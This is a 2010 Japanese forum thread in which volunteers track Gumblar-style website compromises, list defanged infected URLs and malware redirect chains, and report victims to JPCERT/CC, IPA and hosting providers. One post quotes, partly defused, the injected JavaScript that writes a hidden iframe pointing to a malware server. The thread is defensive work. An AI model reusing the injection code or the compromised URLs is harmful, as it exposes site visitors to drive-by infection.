10/05/29 01:15:55
>>256
AdobeReaderは最新じゃなくバージョンをきちんと確認しろ
JavaとFlashPlayerもね
262:256
10/05/29 01:16:06
>>260
はい、更新チェックで確認しました
そうですかとりあえず安心しました。ありがとうございます
263:256
10/05/29 01:23:38
>>261
連投すいません
>3の更新確認でそれら全て更新チェックして全て最初から最新だったと記憶してます。
後、図に乗った質問で申し訳ないんですけど、このウイルスはどういった悪さをするんでしょう?
264:名無しさん@お腹いっぱい。
10/05/29 01:24:43
>>262
ノートンなら以下のクラウド型と併用可だからしてみては?
【併用可】gred AntiVirusアクセラレータ part2
スレリンク(sec板)
265:248
10/05/29 01:26:43
>>257
ありがとうがざいます
一安心です
266:名無しさん@お腹いっぱい。
10/05/29 01:26:56
>>258
どっちみち感染したらFTP含めてWebサービスすべてのIDパスはとられる
自分だけでなくLAN内すべて
あとは偽セキュリティソフトのインストール、特定サイトへの攻撃、
BOT機能のインストールなどいろいろ
267:名無しさん@お腹いっぱい。
10/05/29 01:35:43
>>264
これは今後のセキュリティですね
ありがとうございます。あとで確認してみます
>>266
そうですか…
そうなってくると自分にはもうお手上げですねorz
268:253
10/05/29 01:40:55
>>267
そろそろスレチだが、
>>ノートンインターネットセキュリティ 2009
もしまだライセンス残ってるなら、2010にタダでバージョンうpできるからやっとけ。
URLリンク(updatecenter.norton.com)
269:名無しさん@お腹いっぱい。
10/05/29 01:52:21
>>257
荒らしの仕業だろ
270:名無しさん@お腹いっぱい。
10/05/29 01:58:01
>>257
>>16-19
271:256
10/05/29 02:11:36
>>268
了解です
みなさんありがとうございました
272:名無しさん@お腹いっぱい。
10/05/29 03:42:02
URLリンク(money)●zarathustra-wins●net/2010/01/%E3%82%AC%E3%83%B3%E3%83%96%E3%83%A9%E3%83%BC%E5%AF%BE%E7%AD%96%E3%81%AE%E6%83%85%E5%A0%B1%E3%81%AE%E3%81%BE%E3%81%A8%E3%82%81/
鑑定スレに貼ってたな
273:名無しさん@お腹いっぱい。
10/05/29 12:07:41
日創研石川経営研究会
ウィルスに感染したのに告知無しで復旧
こういうところの会員も同じ穴の狢でモラルもないんだろうな。
274:名無しさん@お腹いっぱい。
10/05/29 12:11:41
>研究会
うさんくせー
275:名無しさん@お腹いっぱい。
10/05/29 12:24:59
専スレがあるじゃん
276:名無しさん@お腹いっぱい。
10/05/29 13:33:38
緑になりますやうに。(-人-)
URLリンク(online.us.drweb.com)
277:名無しさん@お腹いっぱい。
10/05/29 13:59:43
>>272
だが
URLリンク(www.zarathustra-wins.net)のサイトにある
ガンブラー対策のページだな
そこがやられたらしい
272のURLでググるとガンブラー質問系のサイトに結構貼られてるが罠か?
278:名無しさん@お腹いっぱい。
10/05/29 16:07:57
日創研石川経営研究会に電凸してみました
改竄の件は把握していない模様
URLリンク(www.aguse.jp)
↑の076-234-5554あいびーらぼ?がHPを作っていると認めました
>あいびーらぼ?さん
折り返しの電話ありませんねw
自分達のスキルに自信があるのでしょうね
このスレの情報以外の所も改竄されている様ですが、見つけられるかなw
279:名無しさん@お腹いっぱい。
10/05/29 16:24:15
www●j-sports●or●jp
www●itofound●or●jp
cgi●members●interq.or●jp/aquamarine/ruvi/
280:オルティス・ジャパン
10/05/29 16:57:52
>>279
www●itofound●or●jp
ここはガンブラーによって改竄されていると話すと電話を切る
更に電話をすると無言攻撃をする非礼極まりない所
対応は停止する
281:名無しさん@お腹いっぱい。
10/05/29 17:00:24
>www●j-sports●or●jp
CSJスポーツのサイト!?
282:名無しさん@お腹いっぱい。
10/05/29 17:09:48
管理人「gumbler?うっせぇバーカ」
283:名無しさん@お腹いっぱい。
10/05/29 17:21:50
あ
284:名無しさん@お腹いっぱい。
10/05/29 17:26:44
今日は所属してるボランティア団体が所有してるPC10台に、>>4 を施した。
VistaのマシンなんだがSP2すら当たっていなかったので心配だった。
普段は車に積んで移動してるので、なかなかメンテナンスの機会がなくて
たまにEモバなんかでネットに繋いだりするもんだからヒヤヒヤもので...
285:名無しさん@お腹いっぱい。
10/05/29 17:54:32
>>279
www●j-sports●or●jp
www●itofound●or●jp
cgi●members●interq.or●jp/aquamarine/ruvi/
メル凸済み、反応待ち
>>280
一応、so-netとJPCERT/CCにも通報してあります
コレでダメなら別の手を考えますよ…
>>281
ジェイスポーツは「www●jsports●co●jp」
感染してるのは「横浜市・川崎市サッカークラブ」です
286:名無しさん@お腹いっぱい。
10/05/29 18:16:19
告知もせず駆除するだけなんだなあ
個人ならまだわかる、でも法人が平然とやってのける
マジであきれる
287:コテハン ◆8080adndqg
10/05/29 18:16:44
【陥落サイトのURL悪用厳禁】
fps01●plala●or●jp/~zeiken/
www●marbell●jp/img2/photo/tenonaru/index●html
www●pflaster●co●jp/contact/
288:コテハン ◆8080adndqg
10/05/29 18:34:54
>>284
穴があるかもしれないPCには
Firefox+NoScript+AdblockPlus+RequestPolicy
この組み合わせを推奨する。
NoScript→<IFRAME>禁止にチェックを入れる
AdblockPlus→|URLリンク(*:8080) をブロック
289:名無しさん@お腹いっぱい。
10/05/29 19:02:18
>>288
レスありがとう
自宅のPCのデフォはFirefoxなんだが、車に積んでるのは
なにぶん初心者向け講習会用なので、困ったことにデフォは
IEなんだなこれが。
290:名無しさん@お腹いっぱい。
10/05/29 19:03:07
Firefoxなどのブラウザは、MSEや無料版アンチウイルスの幾つかなどトラフィックスキャンをしないものとは組み合わせることは好ましくない
JavascriptはどうしてもONにすることがあると思う、その時にスキャンできず素通りしてしまってる
291:名無しさん@お腹いっぱい。
10/05/29 19:06:18
d-pic●net
292:名無しさん@お腹いっぱい。
10/05/29 19:15:08
Firefoxはむしろダメだろ
293:名無しさん@お腹いっぱい。
10/05/29 19:50:20
だなIEが一番
294:名無しさん@お腹いっぱい。
10/05/29 20:16:12
>>289
とりあえずIE8にしておけばいいとおもうよ
もしくはGoogleChrome
わりと初心者にもすんなり受け入れられる
初心者はそもそもIEでも慣れてるわけじゃないから実はなんでもいいのだ
295:名無しさん@お腹いっぱい。
10/05/29 20:42:23
>>287
メル凸済み、pflasterにはメール届かず、その他は反応待ち
>>291
メル凸済み、反応待ち
296:名無しさん@お腹いっぱい。
10/05/29 21:10:09
テンプラの対策してたらIE8でも保護モードで運用すれば
ゼロDay食わない限りそうそう怖いことなかろうて
297:名無しさん@お腹いっぱい。
10/05/29 21:45:37
>>273-276
15:50着、かすぺ対応とのこと、持ってる人は確認お願いぽ。
> Trojan-Downloader.JS.Pegel.av
> New malicious software was found in these files. Detection will be included in the next update. Thank you for your help.
>>278
乙乙。
鯖缶につーほーしておいてた返事、担当に伝えるとのこと。
298:297
10/05/29 21:48:31
てか>>276はまだ赤かったので>>297カキコしたんだが……
299:297
10/05/29 21:54:20
やっぱ未修正があるー。。。
300:名無しさん@お腹いっぱい。
10/05/29 21:55:55
>>279
おいおいそれってスカパーとかCATVのスポーツかよ?
301:名無しさん@お腹いっぱい。
10/05/29 21:57:04
>>286
駆除すらされずメル凸するまで放置ということもあるけど
まさか毎日ページを見ている管理人が改竄に気づいてないというパターンなのかな?
302:名無しさん@お腹いっぱい。
10/05/29 21:58:17
>>300
CSのJスポーツはwww●jsports●co●jp
303:284
10/05/29 22:19:30
ボランティア団体の方針で、ブラウザはIE7ということになってて...
つまりその、テキストと画面のデザインがほんのちょっとでも異なると
講習生がとまどうからという理由で。
304:名無しさん@お腹いっぱい。
10/05/29 22:23:21
>>303
とまどうのは(柔軟性の無い)おしえているほうだにゃ。
互換性表示ってのあるのに…
305:304
10/05/29 22:25:56
あー、テキストって教習本のことか。
買い換えろ!
つか実施で説明できない人が教えてんのか。
306:名無しさん@お腹いっぱい。
10/05/29 22:33:11
馬鹿のくせに偉そうに指示するな
307:名無しさん@お腹いっぱい。
10/05/29 22:38:48
>>303
今後のことを考えても全く一緒なことはありえないから
画面は多少変わることもあることを口頭で良いから教えるべきだとは思う
家にあるPCがテキストと違うと使えないってことになるだろ
まあ車と違ってコロコロUI変えちゃってる方にも問題はあるんだけども
308:304
10/05/29 23:12:30
うん、言い過ぎたかも。
>>306
ノ
309:名無しさん@お腹いっぱい。
10/05/29 23:20:51
このスレにFirefoxのアンチがいる
310:名無しさん@お腹いっぱい。
10/05/29 23:25:09
お前や
311:名無しさん@お腹いっぱい。
10/05/29 23:32:33
逆で無知なくせに無闇に薦めるやつがいるだけ
312:284
10/05/30 00:11:00
みなさんご心配いただいてありがとう
なにぶん、講習生はお年寄りが対象なので、幹部連中は...
「セキュリティに関してはあまり教え過ぎるとせっかくのやる気をそぐし、
してはいけないことだらけでつまらなくて結局身に付かない」
...ということで、WindowsUpdateを教えることさえあまり乗り気ではないのですよ。
それに、件のパソコンは、長い時にはひと月に一日使うか使わないかっ
ていう利用頻度なもので、ネットにもあまり繋がないのでセキュリティ
アップデートかけるチャンスもなかなかないんです。
それでいていざ講習会が始まると、週一でネットには繋ぐけど
講習の準備と撤収作業が忙しくてアップデートどころじゃなくなっちゃうんで
かえって危ないです。
313:あんちたった ◆MOTO.0SDfQ
10/05/30 00:59:43
TTP://www●aoisys●com/nonstyle/
314:名無しさん@お腹いっぱい。
10/05/30 01:28:40
帰省キタ━━━(゚∀゚)━━━ !!!!!
315:名無しさん@お腹いっぱい。
10/05/30 01:38:32
www●cheesecake●co.jp/cp/2010present05/
ヤフー懸賞経由で応募しようとリンク踏んだらノートン先生の警告でた。
さらに、aguseで、「Gumblarの可能性あり」と出てたから、ヤフーと懸賞主催者に伝えたけど、両者から感染してないわボケと言われたけど、感染してるよね?
316:名無しさん@お腹いっぱい。
10/05/30 01:46:20
>>315
site.jsとかやられてるっち。
317:あんちたった ◆MOTO.0SDfQ
10/05/30 02:19:47
ちょwwwヤフーまでそんなこと言ってんの?
もしかしてHTMLしかみてないの?
318:名無しさん@お腹いっぱい。
10/05/30 02:40:22
なかなかやるものだなaguse
319:名無しさん@お腹いっぱい。
10/05/30 02:41:35
>>315
これどこにあるの?
320:あんちたった ◆MOTO.0SDfQ
10/05/30 02:46:58
>>319
>>316に書かれてるファイルを探せ。
んで、そのファイルの一番後ろ見ろ。
321:名無しさん@お腹いっぱい。
10/05/30 03:17:08
>>315
ボケまで言わないだろw
また電話して録音してみれば?
URLリンク(jsunpack.jeek.org)
322:316
10/05/30 03:42:15
該当サイトにフォームから戸津
鯖缶にもフォームから戸津
やほにもフォームから戸津
ついでにめるぽ
>>315が事実なら由々しき事態。
っと言いたいけど、jsファイルのみの感染の場合(ほかにもあるかもしんないけどー)
結構見逃されがちでこちらから指摘しないと対応されないぽ。。。
323:316
10/05/30 04:42:53
んでついでにVT通して送った検体だけど
かすぺは既に対応済みのこと。
> - HEUR:Trojan-Downloader.Script.Generic
> This files are already detected. Please update your bases.
VTのタイムラグか。。。orz......
ごめんよ、ひげおぢさん。
324:315
10/05/30 08:32:37
315
ごめん。ボケとまでは言われてないです。
ヤフーは、担当者に報告し検証した後、対処すると言われて2週間過ぎましたが、未だに応募可能たし、ウイルス感染無しと判断したんだなと。
懸賞主催者は、調べましたが、ウイルスに感染してません。ウイルスが蔓延してますので、チェックを2重にして気をつけると言われました。
なので、もう、シラネと思ってましたが、このスレ見て一応、このスレを読んでる人だけには報告しておこうと書き込みました。
325:名無しさん@お腹いっぱい。
10/05/30 09:48:17
このサイトのホスティングの「TSUKAERUNET」に通報すればよかったのに。
対応はいいホスティング会社なので、それらばもう止まってたかも
326:名無しさん@お腹いっぱい。
10/05/30 10:10:35
↓直接このURL送っておけば対応はやかったかもな。
URLリンク(www)●cheesecake●co●jp/user_data/packages/org/js/site●js
327:名無しさん@お腹いっぱい。
10/05/30 10:22:28
>>315-316
これ、感染が結構古くない? Wepawetに投げてみたけど、こういう結果だった。
URLリンク(wepawet.iseclab.org)
確かに感染しているんだけど、既に8080のマルウェア配布先が死んでる。(※)
なんで、悪意のある、感染させる方としてはとっくにyahooは用済み状態。
これ、yahooの感染~マルウェア配布鯖停止まで気がつかれなかったとしたら、かなりヤバイ。
(※) Wepawerの解析結果で、Requestsの所の、URLリンク(gothguilt)●ru:8080/google●com/espn●go●com/qip●ru●php
がマルウェアの配布元。 ここにアクセスに行くんだけど、既にStatus = Errorの通り、何も起きない。
私の方もVirtualPC使って無防備で踏んでみたけど、“今は” やっぱり何も落ちてこなかった。 現状無害だけど、どれだけ被害出たんだろう...orz
328:327
10/05/30 10:28:32
>>327
ちなみに、site.jsのVT結果。誰かが最近投げたばかりなので、そのまま引用。
URLリンク(www.virustotal.com)
現時点でも検出 5/41とか...終わったねぇ。orz NortonとKasperskyはヒューリスティックで検出するみたいだけど、その他はどうなっている事やら。
329:327
10/05/30 10:33:37
>>315,327
あ、スマン。Yahooが感染していたんじゃなくて、Yahooの懸賞の所に、感染したサイトがリンクされてたのか。
感染していたのは cheesecake●co●jp の方ですね。スミマセン
330:名無しさん@お腹いっぱい。
10/05/30 10:47:56
>>327
[Trend Micro Security Blog]から引用
URLリンク(blog.trendmicro.co.jp)
>3 不正スクリプトによる不正サイトへの接続は、同じIPアドレスからは初回接続時(または初回接続後のわずかな時間)しか本来の(不正な)応答がされない。
=>マルウェアサンプルの入手が困難になる。
IPアドレス以外に時間などで制御する可能性もありますし、まだ有害かもしれません
331:名無しさん@お腹いっぱい。
10/05/30 11:21:03
cheesecake●co●jpのサイト運営は、実質ここみたい
有限会社みのりや
www●minoriya●co●jp/result/
ここが大丈夫ですって言っているのでしょうね
332:名無しさん@お腹いっぱい。
10/05/30 11:21:49
>>315
user_data/packages/org/js/css.js infected with JS.Redirector.based.3
user_data/packages/org/js/navi.js infected with JS.Redirector.based.3
user_data/packages/org/js/win_op.js infected with JS.Redirector.based.3
user_data/packages/org/js/itembox.js infected with JS.Redirector.based.3
user_data/packages/org/js/site.js infected with JS.Redirector.based.3
メル凸済み、反応待ち
333:327
10/05/30 11:22:33
>>330
ん~、確かに私がアクセス制御に引っかかった可能性はあるね。
とりあえず、流れをみるとサイト管理者の対応が糞らしいので、IE8のSmartScreenと、Firefox経由でGoogleSafeBlowsingに通報しておいた。
このまま放置されていれば、多分、数日中には赤くなるはず。 管理者は逆に青くなると思うが。(苦笑
334:316
10/05/30 11:38:41
>>332は
Last-Modified: Thu, 13 May 2010 11:14:38 GMT
Last-Modified: Thu, 13 May 2010 11:17:39 GMT
Last-Modified: Thu, 13 May 2010 11:18:05 GMT
Last-Modified: Thu, 13 May 2010 11:16:35 GMT
Last-Modified: Thu, 13 May 2010 11:17:49 GMT
>>324
> 2週間過ぎました
やほーは音沙汰無しでぷか。。。
335:八頭 ◆YAGApwSaEw
10/05/30 11:48:35
直通なんてやめて
K察庁経由で伝えてもらえ
336:コテハン ◆8080adndqg
10/05/30 11:59:26
一件だけ投下しとくにゃ
【陥落サイトのURL悪用厳禁】
adajo●namidaame●com
凸してくれてる人>乙です orz
337:名無しさん@お腹いっぱい。
10/05/30 13:54:27
>>280
ここって宗教団体のようですね
URLリンク(www)<)
338:名無しさん@お腹いっぱい。
10/05/30 14:19:30
そういやyahooの占いのページが以前やられていたな
今回はyahooのトップページを開く分には大丈夫なんだろ?
339:名無しさん@お腹いっぱい。
10/05/30 14:53:27
>>337
googleは既に赤くなってる。
URLリンク(safebrowsing.clients.google.com)
早く対応しないから...w
>>338
問題ない。懸賞のページから、>315のリンク先に飛ぶとアウトだったらしい。
340:コテハン ◆8080adndqg
10/05/30 18:33:32
【陥落サイトのURL悪用厳禁】
www●ooraka●com/
<TITLE>パソコン在宅ワーク・常識を超えたパソコン在宅ワーク!</TITLE>
マルウェアが勝手に仕事をしてくれるのが「常識を超えた」ということでしょうかネ?
以下、どーでも良いようなカスサイト
canyonhardware●com/
maillady●hirotu●net/
www●kireibast●sakura●ne●jp/exlwckaj
341:名無しさん@お腹いっぱい。
10/05/30 20:13:48
>>340
www●ooraka●com/
メル凸済み、反応待ち
カスサイトやらは後でまとめてJPCERT/CCに通報しときます
ちょっと仕事が立て込んでるので
342:あんちたった ◆MOTO.0SDfQ
10/05/30 20:26:09
>>326
その書き込みの時点で既に実行済み
343:名無しさん@お腹いっぱい。
10/05/31 01:13:25
www●pflaster●co●jp :Forbidden
d-pic●net :Forbidden
cgi●members●interq●or●jp/aquamarine/ruvi/ :Forbidden
www●garden-bank●com :aguse、Gred、Dr.Webともに反応せず
cowgirl●jp :閉鎖?
www●barakai●com :aguse、Gred、Dr.Webともに反応せず
www●allety●net :閉鎖?
ソース確認してません、暇してるよって方は精査して頂けると助かります
他はまだ駄目みたいなので明日にでも再凸…
>>340
カスサイトとやらをまとめてJPCERT/CCに報告しておきました
ていうかこれ、いつ終息するんでしょorz
344:名無しさん@お腹いっぱい。
10/05/31 01:18:56
>>343追記
「Forbidden」はaguseGWで確認してます
345:コテハン ◆8080adndqg
10/05/31 11:55:44
>>341,343 乙です~
【陥落サイトのURL悪用厳禁】
www●jc-consulting●jp/houkoku_m/index3●html ←絶賛放置中(再再再再・・・晒し)
www●hdta●jp ←絶賛放置中
ayako●h00●jp ←うんこ対応中 ※<!--<script>-->
www●jyoho-review●jp/link/ ←絶賛放置中
www●jyoho-review●jp/item_list/ ←(゚д゚;)
d-pic●net/ ←トップページのみ閉鎖
d-pic●net/以下の階層は絶賛公開中
↓
www●google●co●jp/search?hl=ja&source=hp&q=site%3Ad-pic●net%2F
fps01●plala●or●jp/~zeiken/ ←絶賛放置中
neta-script●lionking●jp/2007/08/ ←絶賛放置中
346:コテハン ◆8080adndqg
10/05/31 12:28:32
【陥落サイトのURL悪用厳禁】
www●spiceheads.com/index●html
↓
最下部の8080以外に
<body link="#DB0000"~中略~<script type='text/javascript'>str="<vdepognbt src=" + unescape('%68%74%74%70・・・
↓
79●135●152●181/stats/go●php?sid=1
※直接踏んだらGoogleに飛ばされて終了orz
この前の<ijbwjuics src=←の後継かな?
347:名無しさん@お腹いっぱい。
10/05/31 12:38:43
・レジナからwww●j-sports●or●jpへウイルスを駆除する様に伝えたとの連絡あり(まだ感染中…)
・つかえるネットからwww●cheesecake●co●jpのサービスを停止しましたとの連絡あり
www●i-keiei●jp :Forbidden
fps01●plala●or●jp/~zeiken :Forbidden
残りはもうしばらく静観
カスサイト、駄目くさいですがどうしたもんでしょう…
348:名無しさん@お腹いっぱい。
10/05/31 14:02:39
>>346
いつもお世話さん
…なんだが、【陥落サイトのURL悪用厳禁】 って書くから悪用するヤツが増えるんじゃないか?
どうせ悪意のあるヤツは書いてもやるだろうし
それに「危険」って書いてあるボタンを押したくなるの法則
349:名無しさん@お腹いっぱい。
10/05/31 14:48:29
> IPAセキュリティセンターです。
> ご連絡、ありがとうございます。
> 当機構でも当該サイトの改ざんを確認しました。
> 改ざんが確認できたサイトの管理者宛てに、サイトが改ざんされている
> 旨の通告をしておきます。
2時間で返事が来たよ…仕事早いな
>>345
お疲れ様です
カスペルスキーがIflamerで検出、ついでにAviraに検体提出
>>346
さくらに通報しようと思ったらメルフォで蹴られた…何故に
他のは後でまとめて見ておきます
>>348
はずせないんじゃない?
過去にいちゃもんつけられてるし
350:名無しさん@お腹いっぱい。
10/05/31 15:13:10
取扱注意
www●rokudai-ouen●com
351:名無しさん@お腹いっぱい。
10/05/31 15:28:03
>>350
Last-Modified: Thu, 20 May 2010 02:42:03 GMT
352:名無しさん@お腹いっぱい。
10/05/31 17:37:11
URLリンク(www)●geocities●jp/tentacles344/hodokyo●html
Gumblar.Xぽい
353:名無しさん@お腹いっぱい。
10/05/31 17:51:16
www●spiceheads●com :Forbidden
www●ooraka●com :Forbidden
www●itofound●or●jp :aguse、Gred、Dr.Webともに反応なし/精査よろ
www●rokudai-ouen●com :Forbidden
354:名無しさん@お腹いっぱい。
10/05/31 17:53:07
www●m-ouen●com :Forbidden
355:名無しさん@お腹いっぱい。
10/05/31 17:55:36
>>352
Gumblar.x確認
exeter-relatives-forum●org●uk/images/hnx5v/gifimg●php
↓
mariosflyingpizzaclearlake●com/images/appetizers●php
↓
latifkm●com/Css/templet11●php
↓
sexfunbeach●com/blogs/moms/wp-content/plugins/index●php
↓
asgardr●fr/memo/robots●php
↓
以後追跡不能
現時点では無害だけど、つーほーしたほうが良いと思う
356:名無しさん@お腹いっぱい。
10/05/31 19:36:18
Gumblar.Xは既に日本を蹴ってるんじゃなかったっけ
357:316
10/05/31 20:27:25
>>356
踏み台は結構あるよ。
358:名無しさん@お腹いっぱい。
10/05/31 20:54:21
>>345
>www●jc-consulting●jp/houkoku_m/index3●html ←絶賛放置中(再再再再・・・晒し)
NTTPCコミュニケーションズに電凸
折り返しの電話があり、対応する旨の話しでした
359:コテハン ◆8080adndqg
10/05/31 21:09:32
>>347,349 乙乙
--
>>346に投下したspiceheads●comに装填されていた8080以外のコード
()<>/.,’”; ←を全角にしてありまつ
<script type=’text/javascript’>str=”<vdepognbt src=” + unescape
(’%68%74%74%70%3a%2f%2f%37%39%2e%31%33%35%2e%31%35%32%2e%31%38%31%2f%73%74%61%74%73%2f%67%6f%2e%70%68%70%3f%73%69%64%3d%31’)
+ ” Oaoz5=’1’vxoq5=’1’>”;str = str.replace(’vde’, ’i’);str =str.replace(’pog’, ’fr’);
str = str.replace(’nbt’, ’ame’);str =str.replace(’Oaoz5’, ’width’);
str =str.replace(’vxoq5’,’height’);document.write(str);</script>
--
microlines●lvって・・・
360:名無しさん@お腹いっぱい。
10/05/31 22:42:35
lv…ラトビアか。zlkon(gumblarの始祖)を思い出す。
361:名無しさん@お腹いっぱい。
10/05/31 22:50:28
>>360
.MSも見たな。
マイクロソフト…
362:名無しさん@お腹いっぱい。
10/05/31 23:10:43
>>359のコードなら難読化って程じゃないですよね
パーセントエンコードしたURLをデコード、「vdepognbt」を分割してreplaceで「iframe」に置換
今までのとは違う人が書いた物みたい
ガンブラーサイトを間貸ししてるのかも
363:名無しさん@お腹いっぱい。
10/05/31 23:27:46
カスペが見逃すやつをavastがことごとく遮断
優秀すぎる
364:名無しさん@お腹いっぱい。
10/05/31 23:43:39
Avira、AVG、MSEは論外・・・なのか?
365:名無しさん@お腹いっぱい。
10/05/31 23:50:39
virustotalで調べたが、上記のサイトでavastはほぼ完璧
MSE、AVIRAはちょっと検出、AVGは反応なしorz
変なサイトに飛ばされて、ウイルス仕込まれそうになった段階で反応するのかもしれないけど
366:327
10/05/31 23:53:36
>>315
感染したスクリプト撤去されたな。 感染コード長期間放置してたのに、何の告知も無しで。
結局、世の中こんな企業ばっかりか。
367:名無しさん@お腹いっぱい。
10/06/01 00:15:05
既出で今スクリプトが埋まってるURL
-8080系
ama●minasan●info/
anime●len2●net/
bentominowa●web●fc2●com/index_files/kotypeb_data/injection_graph_func●js
canyonhardware●com/
hirotu●net/hs/kyujin/maillady/index●htm
infom●biz/secretdiet/
kadaru●mydns●to/ →「ページを表示できないっぽいです(^^;」とあるが、ソースの下の方にスクリプト有り
kadaru●mydns●to/tauchi-office/taikensyugi/
kagaden●com/reiai/
kei●keita-house●com/torabaayu_kansai/
kumarin●biz/
neta-script●lionking●jp/2007/08/
nihon-support●jp/
population-japan●com
san●ron5●com/gbl/
temp●crossmarin●net/include/xoops●js
tenga●s155●coreserver●jp/
thismonky●com/
tw13●net
tw13●net/scratch/
tw13●net/vogue/vogue/index●html
www●adwalk●co●jp/
www●amakusaturigu●com
www●any-news●biz/
www●aoisys●com/nonstyle/
www●asu-job●com/
www●biz-x●jp
www●crossmarin●net/include/xoops●js
368:名無しさん@お腹いっぱい。
10/06/01 00:16:04
www●ftagent●jp/
www●gocha-mix●net/cgi-bin/blog/
www●hd-cre●com/ab-tz/
www●j-sports●or●jp
www●jc-consulting●jp/houkoku_m/index3●html
www●k3●dion●ne●jp/~sym1909/
www●k3●dion●ne●jp/~sym1909/hpbmapscript3●js
www●kireibast●sakura●ne●jp/exlwckaj/
www●marbell●jp/img2/photo/tenonaru/index●html
www●mfreep●com
www●nas-server●info/
www●ne●jp/asahi/sanya/sanpo
www●niaufuku●com/
www●niaufuku●com/sense_up/index●htm
www●nittoka●com/ →ソースの中央付近
www●oc-academy●com/taiken/wind●js
www●pommerland-herb●com/
www●ryu1●co●jp/
www●shinnippo●co●jp/ssff/2006hiroshima/
www●tec●ne●jp/
www●toutyann●com/
www●tu-han4●com/hatumo/
www●wood-sadoh●co●jp/classroom/index●html
www●y2-kco●com/bb-kn/
www12●plala●or●jp/atakashi/sk/
www13●plala●or●jp/metal-militia/
adajo●namidaame●com/ →途中で切れてる
nakaya-world●com/modules/bulletin →途中で切れてる
tukaoh●com →途中で切れてる
www●3ku●jp/grow_images/2005/june/index_2005june●html →途中で切れてる
369:名無しさん@お腹いっぱい。
10/06/01 00:17:04
www●granship●com/index●html →途中で切れてる
www●hdta●jp →途中で切れてる
www●seibidou●jp/products/information_sign/index●html →途中で切れてる
ayako●h00●jp →コメントアウト
butuda●f00●jp →コメントアウト
otokudou●h01●jp/ →コメントアウト
sunrise●2pg●in/ →コメントアウト
-Gumblar.x
ama●koukuujinja●net/vuitton/
doit●itabashido●com/seki/
jamur●jp/
mag●rdy●jp/
plot-office●com/
s1●shard●jp/syozyonudo/
saicho●co●jp/
truth-co●jp/
www●geocities●jp/tentacles344/hodokyo●html
www●kiyasuisan●co●jp/
-その他
winbet●tonosama●jp/
www●acl-music●jp/
www●aquaview●jp/
www●aquaview●jp/m_shop/index●html
www●aquaview●jp/q_a/index●html
www●ed-shop●com/
www●militarize●org/01●htm →ソースの最終行?
www●rctank●jp/ →ソースの最終行?
370:名無しさん@お腹いっぱい。
10/06/01 00:23:09
削除されただけでも、ましだぜ。未だに、絶賛放置中のサイトもあるぐらいだし
315のサイトは、企画、運営が外注だろ。よくこれで、運営してるなと。
Yahooも、自前の懸賞の所に、感染したサイトがリンクされていても放置するのに、フィッシング対策にYahooツールバーを入れよう!と宣伝してるのは笑うわ。
371:名無しさん@お腹いっぱい。
10/06/01 00:31:50
>>362
普通すぎるから激しい難読化より気付き難い(かもしれない)
372:コテハン ◆8080adndqg
10/06/01 00:33:22
>>367-369
373:コテハン ◆8080adndqg
10/06/01 00:38:40
>>372みすった orz
--
>>367-369 まとめ乙です。
>>358 乙です。
so-netさんが4連発w
止まらぬサイト改ざん(1) ISPがガンブラー対策~パスワードリセット敢行も
URLリンク(www.so-net.ne.jp)
止まらぬサイト改ざん(2)「怪しい薬局」に続き「怪しい時計屋キャンペーン」も
URLリンク(www.so-net.ne.jp)
止まらぬサイト改ざん(3)「負の連鎖」を断ち切る「3つの基本対策」実施を
URLリンク(www.so-net.ne.jp)
止まらぬサイト改ざん(4)訪問の心あたりはありませんか~新規告知サイト13件
URLリンク(www.so-net.ne.jp)
サイト復旧後、「告知無し」のカスサイトを晒すスレが必要かな?
374:316
10/06/01 00:46:25
>>373
>>280のホスティングはso-net
> サイト復旧後、「告知無し」のカスサイトを晒すスレが必要かな?
wktk
375:名無しさん@お腹いっぱい。
10/06/01 01:27:51
>>374
so-netから>>280に連絡があったそうです(so-net
こっそり修正しているようですが告知しないのかと聞いたところ
改竄された事実はないとのお言葉でした
ぶちぎれましたね、私はw
会話を録音しているとかで私を警察に訴えるとのこと
この団体をことわざで例えるなら、【逝ってよし】ですかねw
376:名無しさん@お腹いっぱい。
10/06/01 01:29:13
so-net GJ
377:名無しさん@お腹いっぱい。
10/06/01 01:31:10
>>375
たぶんまた改ざんされるんじゃないかな
それでも事実はないと言い張りそうだけど
378:316
10/06/01 01:43:29
>>375
あぁー。。。
>>280のアドレスで具具れば魚醤がでるのでもしものときのために(ry
so-netにはフォームと鯖缶宛にめるして対応の返事があったんだけど、
そんなことになってたとは…(告知のことを>>373のセキュリティニュースから引用してます>>14)
379:名無しさん@お腹いっぱい。
10/06/01 05:38:17
先生に危険認定されてる時点で言い逃れもへったくれもねぇだろうw
380:名無しさん@お腹いっぱい。
10/06/01 09:33:08
議員さんも支持者も大変すなぁ
www●sutoband●org
381:名無しさん@お腹いっぱい。
10/06/01 10:13:34
>>380
とりあえずブログに改ざんされている箇所とIPAのアド書いておいたww
JPCERT/CC通報済み
てか、うちの選挙区の人orz
382:名無しさん@お腹いっぱい。
10/06/01 11:50:27
>>300
さすが民主党議員はテロ行為に余念がない。
383:名無しさん@お腹いっぱい。
10/06/01 12:03:29
絶対守ろう! 世界の平和 地域の安全 日本の将来
その前に何か忘れてませんか
384:名無しさん@お腹いっぱい。
10/06/01 14:32:13
>>375
>会話を録音しているとかで私を警察に訴えるとのこと
so-netと話をしたで始まって、この団体は・・・で結んでるところが少しよくわからない
今後どうすれば訴えるって?それともいきなり警察に相談しますって?
本当なんだとしたらわけわからん
告知の責任を果たさない法人晒しスレのテンプレをマジメに検討した方がいい
385:名無しさん@お腹いっぱい。
10/06/01 14:38:17
基地がいすぎるなwww
386:コテハン ◆8080adndqg
10/06/01 20:01:46
【陥落サイトのURL悪用厳禁】
vaxponys●sakura●ne●jp/hukin-goods●vaxponys●com/
■当サイトのウィルス感染に関するお詫びとお願い
www.i-keiei.jp/2010/05/post_26.html
修正後、告知しないカスサイトは見習ってほしいぞ・・と。
387:名無しさん@お腹いっぱい。
10/06/01 21:12:04
>>386
さくらインターネットに通報しました
>修正後、告知しないカスサイトは見習ってほしい
まったくですね
388:名無しさん@お腹いっぱい。
10/06/01 21:15:43
>>380
404になってますね
389:名無しさん@お腹いっぱい。
10/06/01 21:35:11
>>382
いや逆でしょww
しかし子ども手当・・・みんなに配った麻生さんと比べて不公平感があるし
財政的にも借金して配るという、地域振興券を遥かに超える究極的愚策ですな
といってもガンブラー仕掛けちゃいけませんよ^^
390:名無しさん@お腹いっぱい。
10/06/01 21:44:12
>>388
キャッシュはまだ検出する
391:名無しさん@お腹いっぱい。
10/06/01 21:48:47
aimeblog●com●down●uproda016258●jpg
gredで不正改ざん
392:名無しさん@お腹いっぱい。
10/06/01 22:03:35
>>391
aimeblog●com/だとしたらドメイン自体が真っ黒
